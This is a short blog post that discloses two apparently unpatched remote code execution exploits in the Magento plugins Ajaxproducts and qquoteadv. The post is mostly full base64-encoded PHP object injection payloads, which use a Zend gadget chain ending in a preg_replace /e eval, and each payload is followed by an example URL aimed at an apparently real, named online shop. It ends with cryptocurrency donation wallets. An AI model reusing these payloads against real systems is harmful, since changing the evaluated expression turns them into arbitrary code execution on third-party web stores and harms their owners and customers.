2 0day RCE Magento Plugin's exploitssteemCreated with Sketch.

in #cybersecurity8 years ago

Hello. Now i want to present 2 exploitable Magento Plugins.

Vuln type: RCE
Method: RCE with PHP Object Injection
HTTP GET PARAMETR coded in BASE64, just decode it and check payload. It's really easy. Example of payloads make exit('MazaYana')

  1. Ajaxproducts
    /index.php/ajaxproducts/index/index/?params=Tzo4OiJaZW5kX0xvZyI6MTp7czoxMToiACoAX3dyaXRlcnMiO2E6MTp7aTowO086MjA6IlplbmRfTG9nX1dyaXRlcl9NYWlsIjo1OntzOjE2OiIAKgBfZXZlbnRzVG9NYWlsIjthOjE6e2k6MDtpOjE7fXM6MjI6IgAqAF9sYXlvdXRFdmVudHNUb01haWwiO2E6MDp7fXM6ODoiACoAX21haWwiO086OToiWmVuZF9NYWlsIjowOnt9czoxMDoiACoAX2xheW91dCI7TzoxMToiWmVuZF9MYXlvdXQiOjM6e3M6MTM6IgAqAF9pbmZsZWN0b3IiO086MjM6IlplbmRfRmlsdGVyX1ByZWdSZXBsYWNlIjoyOntzOjE2OiIAKgBfbWF0Y2hQYXR0ZXJuIjtzOjc6Ii8oLiopL2UiO3M6MTU6IgAqAF9yZXBsYWNlbWVudCI7czoxNjoiZXhpdCgiTWFaYVlhTmEiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fQ==

Example: https://tintenzeile.de/index.php/ajaxproducts/index/index/?params=Tzo4OiJaZW5kX0xvZyI6MTp7czoxMToiACoAX3dyaXRlcnMiO2E6MTp7aTowO086MjA6IlplbmRfTG9nX1dyaXRlcl9NYWlsIjo1OntzOjE2OiIAKgBfZXZlbnRzVG9NYWlsIjthOjE6e2k6MDtpOjE7fXM6MjI6IgAqAF9sYXlvdXRFdmVudHNUb01haWwiO2E6MDp7fXM6ODoiACoAX21haWwiO086OToiWmVuZF9NYWlsIjowOnt9czoxMDoiACoAX2xheW91dCI7TzoxMToiWmVuZF9MYXlvdXQiOjM6e3M6MTM6IgAqAF9pbmZsZWN0b3IiO086MjM6IlplbmRfRmlsdGVyX1ByZWdSZXBsYWNlIjoyOntzOjE2OiIAKgBfbWF0Y2hQYXR0ZXJuIjtzOjc6Ii8oLiopL2UiO3M6MTU6IgAqAF9yZXBsYWNlbWVudCI7czoxNjoiZXhpdCgiTWFaYVlhTmEiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fQ==

  1. /index.php/qquoteadv/download/downloadCustomOption/?id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ==

Example: http://onestopworkwear.com/index.php/qquoteadv/download/downloadCustomOption/?id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ==

If will copy this info, please, set link to this article, thanks.

Wallets for donation:
BTC 13mq6pQNvPTdaEk4RsNfCfb7yM4ixBEifM
ETH 0x8061bb5d617dd8958680a9ab900b29cf65a2608b

Thanks, your NullByte.

magento large.png